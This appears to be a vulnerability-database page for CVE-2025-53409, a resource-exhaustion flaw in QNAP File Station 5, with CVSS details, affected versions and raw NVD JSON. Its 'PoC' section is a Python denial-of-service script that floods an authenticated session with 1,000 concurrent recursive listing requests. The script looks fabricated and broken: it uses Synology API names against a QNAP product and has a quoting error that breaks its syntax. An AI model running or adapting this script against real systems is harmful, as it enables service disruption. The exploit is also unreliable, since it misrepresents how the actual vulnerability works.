Security Vulnerability Report
中文
CVE-2025-53409 CVSS 6.5 MEDIUM

CVE-2025-53409

Published: 2025-11-07 16:15:39
Last Modified: 2025-11-14 20:10:54
Source: [email protected]

Description

An allocation of resources without limits or throttling vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource. We have already fixed the vulnerability in the following version: File Station 5 5.5.6.5018 and later

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:qnap:file_station:*:*:*:*:*:*:*:* - VULNERABLE
File Station 5 < 5.5.6.5018

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import concurrent.futures import time # CVE-2025-53409 PoC - Resource Exhaustion Attack # Target: QNAP File Station 5 # Requirement: Valid user credentials TARGET_URL = "https://<target-ip>/cgi-bin/filestation/" USERNAME = "<attacker-account>" PASSWORD = "<attacker-password>" def create_session(): """Create authenticated session""" session = requests.Session() login_data = { "username": USERNAME, "password": PASSWORD } # Perform authentication session.post(TARGET_URL + "auth.cgi", data=login_data) return session def resource_exhaustion_request(session): """Send resource-intensive request to File Station""" try: # Large file listing request params = { "api": "SYNO.FileStation.List", "method": "list", "version": 2, "path": "/", "recursive": True, "additional": "["size","time","perm"]" } session.get(TARGET_URL + "request.cgi", params=params) return True except Exception as e: print(f"Request failed: {e}") return False def exploit(): """Execute resource exhaustion attack""" session = create_session() print("Starting resource exhaustion attack...") # Send concurrent requests to exhaust resources with concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor: futures = [executor.submit(resource_exhaustion_request, session) for _ in range(1000)] results = [f.result() for f in concurrent.futures.as_completed(futures)] print(f"Attack completed. {sum(results)} requests sent.") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53409", "sourceIdentifier": "[email protected]", "published": "2025-11-07T16:15:39.247", "lastModified": "2025-11-14T20:10:53.723", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An allocation of resources without limits or throttling vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5018 and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:file_station:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5.6.4691", "versionEndExcluding": "5.5.6.5018", "matchCriteriaId": "A8CD1AA7-AC4B-4100-9789-50556BA83F52"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-25-38", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.